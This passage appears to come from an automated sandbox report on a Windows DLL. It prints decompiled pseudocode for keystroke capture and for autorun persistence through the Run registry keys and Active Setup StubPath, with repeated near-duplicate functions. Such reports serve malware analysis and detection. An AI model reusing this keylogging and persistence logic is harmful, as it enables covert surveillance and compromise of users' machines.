                  				_t113 = ToUnicodeEx( *(_t118 + 0xc) & 0x0000ffff,  *(_t118 + 0x10) & 0x0000ffff, _t118 - 0x101, _t118 - 0x30c, 0x100, 0, _t104);
                  				if(_t113 <= 0) {
                  					__eflags = _t113;
                  					if(_t113 < 0) {
                  						 *0x1000f6d8 =  *(_t118 + 0xc) & 0x0000ffff;
                  						 *0x1000f6dc =  *(_t118 + 0x10) & 0x0000ffff;
                  						memcpy(0x1000f6e0, _t118 - 0x101, 0x40 << 2);
                  						_t108 = _t104;
                  						_t115 = _t113;
                  						E100050D8();
                  						MapVirtualKeyW(0x6e, 1);
                  						__eflags = _t115;
                  						if(_t115 < 0) {
                  							do {
                  								_t52 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t118 - 0x40c, _t118 - 0x30c, 0x100, 0, _t108);
                  								__eflags = _t52;
                  							} while (_t52 < 0);
                  						}
                  					}
                  				} else {
                  					memcpy(_t118 - 0x20c, 0x1000f6d8, 0x42 << 2);
                  					_t112 = _t104;
                  					E10003A34( *_t76, 0);
                  					if(0 == 0) {
                  						E100038E0(_t76, 0x80, _t118 - 0x30c);
                  						_t128 =  *((char*)(_t118 - 1));
                  						if( *((char*)(_t118 - 1)) == 0) {
                  							E10006D80( *_t76, _t76, 0x80, _t118 - 0x414, _t112, 0x1000f6d8, __eflags);
                  							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x414)));
                  						} else {
                  							E10006DFC( *_t76, _t76, 0x80, _t118 - 0x410, _t112, 0x1000f6d8, _t128);
                  							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x410)));
                  						}
                  					}
                  					_t56 =  *(_t118 - 0x20c);
                  					_t129 = _t56;
                  					if(_t129 != 0) {
                  						ToUnicodeEx(_t56,  *(_t118 - 0x208), _t118 - 0x204, _t118 - 0x30c, 0x100, 0, _t112);
                  					}
                  					E100050D8();
                  				}
                  				E10003A34( *_t76, L"KeyDelBackspace");
                  				if(_t129 == 0) {
                  					E10003770(_t76);
                  				}
                  				_pop(_t88);
                  				 *[fs:eax] = _t88;
                  				_push(E100078BE);
                  				return E10003788(_t118 - 0x414, 2);
                  			}

                  0x100072bb
                  0x100072bb
                  0x100072c2
                  0x100076f0
                  0x100076f5
                  0x10007727
                  0x10007727
                  0x10007731
                  0x10007759
                  0x1000775d
                  0x1000780e
                  0x10007810
                  0x10007816
                  0x1000781f
                  0x10007836
                  0x10007838
                  0x10007839
                  0x10007845
                  0x1000784e
                  0x10007853
                  0x10007855
                  0x10007857
                  0x10007879
                  0x10007880
                  0x10007880
                  0x10007857
                  0x10007855
                  0x10007763
                  0x10007774
                  0x10007776
                  0x1000777b
                  0x10007780
                  0x1000778f
                  0x10007794
                  0x10007798
                  0x100077be
                  0x100077cb
                  0x1000779a
                  0x100077a2
                  0x100077af
                  0x100077af
                  0x10007798
                  0x100077d0
                  0x100077d6
                  0x100077d8
                  0x100077f8
                  0x100077f8
                  0x10007807
                  0x10007807
                  0x1000788b
                  0x10007890
                  0x10007894
                  0x10007894
                  0x1000789b
                  0x1000789e
                  0x100078a1
                  0x100078b6

                  APIs
                    • Part of subcall function 100037AC: SysReAllocStringLen.OLEAUT32(1000D0D0,1000CFDC,00000002), ref: 100037C2
                  • ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 10007754
                  • ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 100077F8
                  • MapVirtualKeyW.USER32(0000006E,00000001), ref: 1000784E
                  • MapVirtualKeyW.USER32(0000006E,00000001), ref: 10007871
                  • ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 10007879
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true
                  • Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp
                  • Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp
                  • Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp
                  • Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp
                  • Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp
                  Yara matches
                  Similarity
                  • API ID: Unicode$Virtual$AllocString
                  • String ID: KeyDelBackspace$Numpad
                  • API String ID: 783433895-3409537306
                  • Opcode ID: 58d40c07809cf6c1f88f00f7cd4d01a1027e2dbe51f130ce30c58b48c389b237
                  • Instruction ID: 033e83d321774fcd4bda94542bc8b64ee5515bfb92d199e6e3b91a957bdcd820
                  • Opcode Fuzzy Hash: 58d40c07809cf6c1f88f00f7cd4d01a1027e2dbe51f130ce30c58b48c389b237
                  • Instruction Fuzzy Hash: 0831C0B8F042545BF722CB658C45B9F73A9FB882C0F50C0A5F5489720ECA78EE45CB61
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 80%
                  			E100072EE(intOrPtr* __ebx, void* __ecx, struct HKL__* __edi) {
                  				int _t52;
                  				int _t56;
                  				intOrPtr* _t76;
                  				intOrPtr _t88;
                  				struct HKL__* _t104;
                  				struct HKL__* _t108;
                  				struct HKL__* _t112;
                  				int _t113;
                  				int _t115;
                  				void* _t118;
                  				int _t129;
                  
                  				_t104 = __edi;
                  				_t76 = __ebx;
                  				E100037AC(__ebx, 0x10007a98);
                  				E10003A34( *__ebx, 0);
                  				if(0 != 0 &&  *0x1000f6c2 == 1 && E10003B94(0x10008004,  *__ebx) > 0 && E10003B94(L"Numpad",  *__ebx) <= 0) {
                  					E100037AC(__ebx, L"KeyDelBackspace");
                  				}
                  				 *((char*)(_t118 - 1)) = E10006D04();
                  				_t113 = ToUnicodeEx( *(_t118 + 0xc) & 0x0000ffff,  *(_t118 + 0x10) & 0x0000ffff, _t118 - 0x101, _t118 - 0x30c, 0x100, 0, _t104);
                  				if(_t113 <= 0) {
                  					__eflags = _t113;
                  					if(_t113 < 0) {
                  						 *0x1000f6d8 =  *(_t118 + 0xc) & 0x0000ffff;
                  						 *0x1000f6dc =  *(_t118 + 0x10) & 0x0000ffff;
                  						memcpy(0x1000f6e0, _t118 - 0x101, 0x40 << 2);
                  						_t108 = _t104;
                  						_t115 = _t113;
                  						E100050D8();
                  						MapVirtualKeyW(0x6e, 1); /* 0x6e = VK_DECIMAL; the loop below repeats ToUnicodeEx on it until the result is no longer negative, clearing a pending dead-key state */
                  						__eflags = _t115;
                  						if(_t115 < 0) {
                  							do {
                  								_t52 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t118 - 0x40c, _t118 - 0x30c, 0x100, 0, _t108);
                  								__eflags = _t52;
                  							} while (_t52 < 0);
                  						}
                  					}
                  				} else {
                  					memcpy(_t118 - 0x20c, 0x1000f6d8, 0x42 << 2);
                  					_t112 = _t104;
                  					E10003A34( *_t76, 0);
                  					if(0 == 0) {
                  						E100038E0(_t76, 0x80, _t118 - 0x30c);
                  						_t128 =  *((char*)(_t118 - 1));
                  						if( *((char*)(_t118 - 1)) == 0) {
                  							E10006D80( *_t76, _t76, 0x80, _t118 - 0x414, _t112, 0x1000f6d8, __eflags);
                  							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x414)));
                  						} else {
                  							E10006DFC( *_t76, _t76, 0x80, _t118 - 0x410, _t112, 0x1000f6d8, _t128);
                  							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x410)));
                  						}
                  					}
                  					_t56 =  *(_t118 - 0x20c);
                  					_t129 = _t56;
                  					if(_t129 != 0) {
                  						ToUnicodeEx(_t56,  *(_t118 - 0x208), _t118 - 0x204, _t118 - 0x30c, 0x100, 0, _t112);
                  					}
                  					E100050D8();
                  				}
                  				E10003A34( *_t76, L"KeyDelBackspace");
                  				if(_t129 == 0) {
                  					E10003770(_t76);
                  				}
                  				_pop(_t88);
                  				 *[fs:eax] = _t88;
                  				_push(E100078BE);
                  				return E10003788(_t118 - 0x414, 2);
                  			}

                  Instruction addresses (address column of the listing above, one entry per decompiled line): 0x100072ee to 0x100078b6

                  APIs
                    • Part of subcall function 100037AC: SysReAllocStringLen.OLEAUT32(1000D0D0,1000CFDC,00000002), ref: 100037C2
                  • ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 10007754
                  • ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 100077F8
                  • MapVirtualKeyW.USER32(0000006E,00000001), ref: 1000784E
                  • MapVirtualKeyW.USER32(0000006E,00000001), ref: 10007871
                  • ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 10007879
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true
                  • Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp
                  • Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp
                  • Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp
                  • Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp
                  • Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp
                  Yara matches
                  Similarity
                  • API ID: Unicode$Virtual$AllocString
                  • String ID: KeyDelBackspace$Numpad
                  • API String ID: 783433895-3409537306
                  • Opcode ID: aa20c933a58f2305242e8b78a34cde6f3360a0dc9dcf15ed5906f17daae1d160
                  • Instruction ID: c55d23e60b6bc9fae09bc4a5971d47f8544ea9c2ea09269a4cd522e11abc3ca6
                  • Opcode Fuzzy Hash: aa20c933a58f2305242e8b78a34cde6f3360a0dc9dcf15ed5906f17daae1d160
                  • Instruction Fuzzy Hash: 5E31C0B8F042545BF722CB658C45B9F73A9FB892C0F50C0A5F6489720ECA78EE45CB61
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 77%
                  			E10009E6C(intOrPtr* __eax, void* __ebx, void* __edx, void* __edi, void* __esi) {
                  				char _v8;
                  				char _v12;
                  				char _v16;
                  				intOrPtr _v117;
                  				void _v1264;
                  				char _v1386;
                  				char _v1508;
                  				char _v1509;
                  				char _v1510;
                  				char _v1511;
                  				char _v1512;
                  				char _v1634;
                  				char _v1756;
                  				char _v1878;
                  				char _v1880;
                  				void _v5028;
                  				char _v5032;
                  				char _v5036;
                  				char _v5040;
                  				char _v5044;
                  				char _v5048;
                  				char _v5052;
                  				char _v5056;
                  				char _v5060;
                  				void _v5184;
                  				char _v5188;
                  				char _v5192;
                  				intOrPtr* _t61;
                  				void* _t91;
                  				void* _t129;
                  				intOrPtr _t155;
                  				void* _t191;
                  				void* _t192;
                  				void* _t202;
                  
                  				_t127 = __ebx;
                  				_t61 = __eax +  *__eax;
                  				 *_t61 =  *_t61 + _t61;
                  				_pop(_t192);
                  				 *_t61 =  *_t61 + _t61;
                  				_v117 = _v117 + __edx;
                  				_t191 = _t192;
                  				_t129 = 0x288;
                  				do {
                  					_push(0);
                  					_push(0);
                  					_t129 = _t129 - 1;
                  				} while (_t129 != 0);
                  				_push(_t129);
                  				_push(__ebx);
                  				_t189 = __edx;
                  				_v8 = memcpy( &_v5028, __edx, 0x4e4 << 2);
                  				E10003C28( &_v8);
                  				_push(_t191);
                  				_push(0x1000a113);
                  				_push( *[fs:eax]);
                  				 *[fs:eax] = _t192 + 0xc;
                  				if(_v1880 != 0) {
                  					_t199 = _v1512 - 1;
                  					if(_v1512 == 1) {
                  						E100038E0( &_v5032, 0x3d,  &_v1878);
                  						E1000577C(0x80000002, __ebx, _v5032, L"Software\\Microsoft\\Windows\\CurrentVersion\\Run", _t189, _t199, 2, _v8); /* 0x80000002 = HKEY_LOCAL_MACHINE */
                  					}
                  					_t200 = _v1511 - 1;
                  					if(_v1511 == 1) {
                  						E100038E0( &_v5036, 0x3d,  &_v1756);
                  						E1000577C(0x80000001, _t127, _v5036, L"Software\\Microsoft\\Windows\\CurrentVersion\\Run", _t189, _t200, 2, _v8); /* 0x80000001 = HKEY_CURRENT_USER */
                  					}
                  					_t201 = _v1510 - 1;
                  					if(_v1510 == 1) {
                  						E100038E0( &_v5044, 0x3d,  &_v1634);
                  						E10003988( &_v5040, _v5044, L"Software\\Microsoft\\Active Setup\\Installed Components\\", _t201);
                  						E100059E8(0x80000001, _t127, _v5040, _t201); /* 0x80000001 = HKEY_CURRENT_USER; same Active Setup component key under HKCU */
                  						E10003988( &_v5048, L" restart", _v8, _t201);
                  						E100038E0( &_v5056, 0x3d,  &_v1634);
                  						E10003988( &_v5052, _v5056, L"Software\\Microsoft\\Active Setup\\Installed Components\\", _t201);
                  						E1000577C(0x80000002, _t127, L"StubPath", _v5052, _t189, _t201, 2, _v5048); /* 0x80000002 = HKEY_LOCAL_MACHINE; _v5048 is the string built from _v8 and L" restart" */
                  					}
                  					_t202 = _v1509 - 1;
                  					if(_t202 == 0) {
                  						E100034B0( &_v5060, 0x3d,  &_v1264);
                  						E1000362C(_v5060, "%SERVER%");
                  						if(_t202 == 0) {
                  							E10005240(_v8, _t127, 0x3d,  &_v5184);
                  							_t189 =  &_v5184;
                  							memcpy( &_v1264,  &_v5184, 0x1e << 2);
                  							asm("movsw");
                  						}
                  						E100038E0( &_v16, 0x3d,  &_v1508);
                  						E10003AB8(_v16, E10003B94(0x1000a23c, _v16) - 1, 1, E10003B94(0x1000a23c, _v16) - 1,  &_v12);
                  						E10003B04( &_v16, E10003B94(0x1000a23c, _v16), 1, E10003B94(0x1000a23c, _v16) - 1);
                  						_t91 = E10005A94(_v12, _t127, _t87);
                  						E100038E0( &_v5188, 0x3d,  &_v1264);
                  						E100038E0( &_v5192, 0x3d,  &_v1386);
                  						E1000577C(_t91, _t91, _v5192, _v16, _t189, E10003B94(0x1000a23c, _v16) - 1, 2, _v5188);
                  					}
                  				}
                  				_pop(_t155);
                  				 *[fs:eax] = _t155;
                  				_push(E1000A11A);
                  				E10003788( &_v5192, 2);
                  				E100032CC( &_v5060);
                  				E10003788( &_v5056, 7);
                  				return E10003788( &_v16, 3);
                  			}

                  Instruction addresses (address column of the listing above, one entry per decompiled line): 0x10009e6c to 0x1000a112

                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true
                  • Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp
                  • Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp
                  • Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp
                  • Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp
                  • Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp
                  Yara matches
                  Similarity
                  • API ID: CloseCreateFreeStringValue
                  • String ID: restart$%SERVER%$Software\Microsoft\Active Setup\Installed Components\$Software\Microsoft\Windows\CurrentVersion\Run$StubPath
                  • API String ID: 523044198-2142522223
                  • Opcode ID: 364ad897bbca38481dd1a11b2b492bd1a693bcb91c63773ed721ecd4ba2295bf
                  • Instruction ID: ccd5ba8bb55e14e3b401f0629b5d5422583a699d941ac8acb34279bb9c56e552
                  • Opcode Fuzzy Hash: 364ad897bbca38481dd1a11b2b492bd1a693bcb91c63773ed721ecd4ba2295bf
                  • Instruction Fuzzy Hash: A4619438A0415D9FEB25C750C881BDEB3BEEF45380F8081D6A908A768ADB756F85CF51
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 77%
                  			E10009E70(intOrPtr* __eax, void* __ebx, void* __edx, void* __edi, void* __esi) {
                  				char _v8;
                  				char _v12;
                  				char _v16;
                  				intOrPtr _v117;
                  				void _v1264;
                  				char _v1386;
                  				char _v1508;
                  				char _v1509;
                  				char _v1510;
                  				char _v1511;
                  				char _v1512;
                  				char _v1634;
                  				char _v1756;
                  				char _v1878;
                  				char _v1880;
                  				void _v5028;
                  				char _v5032;
                  				char _v5036;
                  				char _v5040;
                  				char _v5044;
                  				char _v5048;
                  				char _v5052;
                  				char _v5056;
                  				char _v5060;
                  				void _v5184;
                  				char _v5188;
                  				char _v5192;
                  				void* _t90;
                  				void* _t128;
                  				intOrPtr _t154;
                  				void* _t190;
                  				void* _t191;
                  				void* _t200;
                  
                  				_t126 = __ebx;
                  				_pop(_t191);
                  				 *__eax =  *__eax + __eax;
                  				_v117 = _v117 + __edx;
                  				_t190 = _t191;
                  				_t128 = 0x288;
                  				do {
                  					_push(0);
                  					_push(0);
                  					_t128 = _t128 - 1;
                  				} while (_t128 != 0);
                  				_push(_t128);
                  				_push(__ebx);
                  				_t188 = __edx;
                  				_v8 = memcpy( &_v5028, __edx, 0x4e4 << 2);
                  				E10003C28( &_v8);
                  				_push(_t190);
                  				_push(0x1000a113);
                  				_push( *[fs:eax]);
                  				 *[fs:eax] = _t191 + 0xc;
                  				if(_v1880 != 0) {
                  					_t197 = _v1512 - 1;
                  					if(_v1512 == 1) {
                  						E100038E0( &_v5032, 0x3d,  &_v1878);
                  						E1000577C(0x80000002, __ebx, _v5032, L"Software\\Microsoft\\Windows\\CurrentVersion\\Run", _t188, _t197, 2, _v8);
                  					}
                  					_t198 = _v1511 - 1;
                  					if(_v1511 == 1) {
                  						E100038E0( &_v5036, 0x3d,  &_v1756);
                  						E1000577C(0x80000001, _t126, _v5036, L"Software\\Microsoft\\Windows\\CurrentVersion\\Run", _t188, _t198, 2, _v8);
                  					}
                  					_t199 = _v1510 - 1;
                  					if(_v1510 == 1) {
                  						E100038E0( &_v5044, 0x3d,  &_v1634);
                  						E10003988( &_v5040, _v5044, L"Software\\Microsoft\\Active Setup\\Installed Components\\", _t199);
                  						E100059E8(0x80000001, _t126, _v5040, _t199);
                  						E10003988( &_v5048, L" restart", _v8, _t199);
                  						E100038E0( &_v5056, 0x3d,  &_v1634);
                  						E10003988( &_v5052, _v5056, L"Software\\Microsoft\\Active Setup\\Installed Components\\", _t199);
                  						E1000577C(0x80000002, _t126, L"StubPath", _v5052, _t188, _t199, 2, _v5048);
                  					}
                  					_t200 = _v1509 - 1;
                  					if(_t200 == 0) {
                  						E100034B0( &_v5060, 0x3d,  &_v1264);
                  						E1000362C(_v5060, "%SERVER%");
                  						if(_t200 == 0) {
                  							E10005240(_v8, _t126, 0x3d,  &_v5184);
                  							_t188 =  &_v5184;
                  							memcpy( &_v1264,  &_v5184, 0x1e << 2);
                  							asm("movsw");
                  						}
                  						E100038E0( &_v16, 0x3d,  &_v1508);
                  						E10003AB8(_v16, E10003B94(0x1000a23c, _v16) - 1, 1, E10003B94(0x1000a23c, _v16) - 1,  &_v12);
                  						E10003B04( &_v16, E10003B94(0x1000a23c, _v16), 1, E10003B94(0x1000a23c, _v16) - 1);
                  						_t90 = E10005A94(_v12, _t126, _t86);
                  						E100038E0( &_v5188, 0x3d,  &_v1264);
                  						E100038E0( &_v5192, 0x3d,  &_v1386);
                  						E1000577C(_t90, _t90, _v5192, _v16, _t188, E10003B94(0x1000a23c, _v16) - 1, 2, _v5188);
                  					}
                  				}
                  				_pop(_t154);
                  				 *[fs:eax] = _t154;
                  				_push(E1000A11A);
                  				E10003788( &_v5192, 2);
                  				E100032CC( &_v5060);
                  				E10003788( &_v5056, 7);
                  				return E10003788( &_v16, 3);
                  			}

                  Instruction addresses (address column of the listing above, one entry per decompiled line): 0x10009e70 to 0x1000a112

                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true
                  • Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp
                  • Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp
                  • Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp
                  • Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp
                  • Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp
                  Yara matches
                  Similarity
                  • API ID: CloseCreateFreeStringValue
                  • String ID: restart$%SERVER%$Software\Microsoft\Active Setup\Installed Components\$Software\Microsoft\Windows\CurrentVersion\Run$StubPath
                  • API String ID: 523044198-2142522223
                  • Opcode ID: 70bc63b1d7bf7f2434c0fd2a984a390c0a29f6a211df66fcb658c6ec4d215a6a
                  • Instruction ID: 7bb9cab796adacb123c590501e10766ab110edc906df9b0df81ab3aad42e102a
                  • Opcode Fuzzy Hash: 70bc63b1d7bf7f2434c0fd2a984a390c0a29f6a211df66fcb658c6ec4d215a6a
                  • Instruction Fuzzy Hash: 23619438A0415D9BEB25C750C881BDEB3BEEF45380F8081D6A908A764ADB756F85CF51
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 78%
                  			E10009E74(void* __ebx, void* __edx, void* __edi, void* __esi) {
                  				char _v8;
                  				char _v12;
                  				char _v16;
                  				void _v1264;
                  				char _v1386;
                  				char _v1508;
                  				char _v1509;
                  				char _v1510;
                  				char _v1511;
                  				char _v1512;
                  				char _v1634;
                  				char _v1756;
                  				char _v1878;
                  				char _v1880;
                  				void _v5028;
                  				char _v5032;
                  				char _v5036;
                  				char _v5040;
                  				char _v5044;
                  				char _v5048;
                  				char _v5052;
                  				char _v5056;
                  				char _v5060;
                  				void _v5184;
                  				char _v5188;
                  				char _v5192;
                  				void* _t87;
                  				void* _t125;
                  				intOrPtr _t151;
                  				void* _t187;
                  				void* _t188;
                  				void* _t196;
                  
                  				_t123 = __ebx;
                  				_t187 = _t188;
                  				_t125 = 0x288;
                  				do {
                  					_push(0);
                  					_push(0);
                  					_t125 = _t125 - 1;
                  				} while (_t125 != 0);
                  				_push(_t125);
                  				_push(__ebx);
                  				_t185 = __edx;
                  				_v8 = memcpy( &_v5028, __edx, 0x4e4 << 2);
                  				E10003C28( &_v8);
                  				_push(_t187);
                  				_push(0x1000a113);
                  				_push( *[fs:eax]);
                  				 *[fs:eax] = _t188 + 0xc;
                  				if(_v1880 != 0) {
                  					_t193 = _v1512 - 1;
                  					if(_v1512 == 1) {
                  						E100038E0( &_v5032, 0x3d,  &_v1878);
                  						E1000577C(0x80000002, __ebx, _v5032, L"Software\\Microsoft\\Windows\\CurrentVersion\\Run", _t185, _t193, 2, _v8);
                  					}
                  					_t194 = _v1511 - 1;
                  					if(_v1511 == 1) {
                  						E100038E0( &_v5036, 0x3d,  &_v1756);
                  						E1000577C(0x80000001, _t123, _v5036, L"Software\\Microsoft\\Windows\\CurrentVersion\\Run", _t185, _t194, 2, _v8);
                  					}
                  					_t195 = _v1510 - 1;
                  					if(_v1510 == 1) {
                  						E100038E0( &_v5044, 0x3d,  &_v1634);
                  						E10003988( &_v5040, _v5044, L"Software\\Microsoft\\Active Setup\\Installed Components\\", _t195);
                  						E100059E8(0x80000001, _t123, _v5040, _t195);
                  						E10003988( &_v5048, L" restart", _v8, _t195);
                  						E100038E0( &_v5056, 0x3d,  &_v1634);
                  						E10003988( &_v5052, _v5056, L"Software\\Microsoft\\Active Setup\\Installed Components\\", _t195);
                  						E1000577C(0x80000002, _t123, L"StubPath", _v5052, _t185, _t195, 2, _v5048);
                  					}
                  					_t196 = _v1509 - 1;
                  					if(_t196 == 0) {
                  						E100034B0( &_v5060, 0x3d,  &_v1264);
                  						E1000362C(_v5060, "%SERVER%");
                  						if(_t196 == 0) {
                  							E10005240(_v8, _t123, 0x3d,  &_v5184);
                  							_t185 =  &_v5184;
                  							memcpy( &_v1264,  &_v5184, 0x1e << 2);
                  							asm("movsw");
                  						}
                  						E100038E0( &_v16, 0x3d,  &_v1508);
                  						E10003AB8(_v16, E10003B94(0x1000a23c, _v16) - 1, 1, E10003B94(0x1000a23c, _v16) - 1,  &_v12);
                  						E10003B04( &_v16, E10003B94(0x1000a23c, _v16), 1, E10003B94(0x1000a23c, _v16) - 1);
                  						_t87 = E10005A94(_v12, _t123, _t83);
                  						E100038E0( &_v5188, 0x3d,  &_v1264);
                  						E100038E0( &_v5192, 0x3d,  &_v1386);
                  						E1000577C(_t87, _t87, _v5192, _v16, _t185, E10003B94(0x1000a23c, _v16) - 1, 2, _v5188);
                  					}
                  				}
                  				_pop(_t151);
                  				 *[fs:eax] = _t151;
                  				_push(E1000A11A);
                  				E10003788( &_v5192, 2);
                  				E100032CC( &_v5060);
                  				E10003788( &_v5056, 7);
                  				return E10003788( &_v16, 3);
                  			}

                  Instruction addresses (address column of the listing above, one entry per decompiled line): 0x10009e74 to 0x1000a112

                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true
                  • Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp
                  • Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp
                  • Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp
                  • Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp
                  • Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp
                  Yara matches
                  Similarity
                  • API ID: CloseCreateFreeStringValue
                  • String ID: restart$%SERVER%$Software\Microsoft\Active Setup\Installed Components\$Software\Microsoft\Windows\CurrentVersion\Run$StubPath
                  • API String ID: 523044198-2142522223
                  • Opcode ID: 6a3a9802c04267f5677fb71fa8e26ddd48aad684d5027258f0195948b13e5c11
                  • Instruction ID: 51db14d9a78096dfca6e0b2c0cac839b55e5a7d9a5be764b8c5632986f08cd1f
                  • Opcode Fuzzy Hash: 6a3a9802c04267f5677fb71fa8e26ddd48aad684d5027258f0195948b13e5c11
                  • Instruction Fuzzy Hash: B5619338A0415D9BEB15D750C841BDEB3BEEF45380F8081E6A908A7249DB75AF85CF51
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true
                  • Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp
                  • Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp
                  • Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp
                  • Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp
                  • Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: &amp;$&gt;$&lt;$&quot;$<br />
                  • API String ID: 0-2730314969
                  • Opcode ID: 0cd1edd9943d5066e4ed9cbb4ed191d6f01f5bec750c3f69ea3f40f0141da2ec
                  • Instruction ID: c2b4ba650b709cafa3e4efc2b6e91a51004f46039d2a3ae5a547a61f7c415082
                  • Opcode Fuzzy Hash: 0cd1edd9943d5066e4ed9cbb4ed191d6f01f5bec750c3f69ea3f40f0141da2ec
                  • Instruction Fuzzy Hash: 57314579A04189AFEF05DB94CC819DF77FDFB88680F509061F180A7209DA34AF028B65
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 78%
                  			E100099F8(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi) {
                  				void* _v8;
                  				char _v12;
                  				intOrPtr _v2000;
                  				char _v2124;
                  				char _v2246;
                  				char _v2248;
                  				void _v5020;
                  				char _v5024;
                  				char _v5028;
                  				char _v5032;
                  				char _v5556;
                  				char _v5560;
                  				char _v5564;
                  				char _v5568;
                  				char _v5572;
                  				char _v5576;
                  				char _v5580;
                  				char _v5584;
                  				char _v5588;
                  				char _v5592;
                  				char _v5596;
                  				char _v5600;
                  				char _v5604;
                  				char _v5608;
                  				char _v5612;
                  				char _v5616;
                  				char _v5620;
                  				char _v5624;
                  				char _v5628;
                  				void* _t99;
                  				intOrPtr _t120;
                  				void* _t131;
                  				WCHAR* _t144;
                  				int _t147;
                  				void* _t163;
                  				int _t177;
                  				intOrPtr _t220;
                  				void* _t224;
                  				intOrPtr _t254;
                  				void* _t291;
                  				void* _t293;
                  				WCHAR* _t294;
                  				void* _t296;
                  				void* _t297;
                  				intOrPtr _t302;
                  
                  				_t296 = _t297;
                  				_t220 = 0x2be;
                  				do {
                  					_push(0);
                  					_push(0);
                  					_t220 = _t220 - 1;
                  				} while (_t220 != 0);
                  				_push(_t220);
                  				_t1 =  &_v8;
                  				 *_t1 = _t220;
                  				_t293 = __edx;
                  				_push( *_t1);
                  				_t99 = memcpy( &_v5020, __edx, 0x4e4 << 2);
                  				_t291 = _t293 + 0x9c8;
                  				_pop(_t224);
                  				_t218 = _t224;
                  				_v8 = _t99;
                  				E10003C28( &_v8);
                  				_push(_t296);
                  				_push(0x10009e5e);
                  				_push( *[fs:eax]);
                  				 *[fs:eax] = _t297 + 0xc;
                  				E100037AC(_t224, _v8);
                  				if(_v2248 == 0) {
                  					L28:
                  					_pop(_t254);
                  					 *[fs:eax] = _t254;
                  					_push(E10009E65);
                  					E10003788( &_v5628, 7);
                  					E100032CC( &_v5600);
                  					E10003788( &_v5596, 8);
                  					E100032CC( &_v5564);
                  					E10003770( &_v5560);
                  					E10003788( &_v5032, 3);
                  					return E10003788( &_v12, 2);
                  				} else {
                  					_t120 = _v2000;
                  					_t301 = _t120;
                  					if(_t120 != 0) {
                  						__eflags = _t120 - 1;
                  						if(__eflags != 0) {
                  							__eflags = _t120 - 2;
                  							if(__eflags != 0) {
                  								__eflags = _t120 - 3;
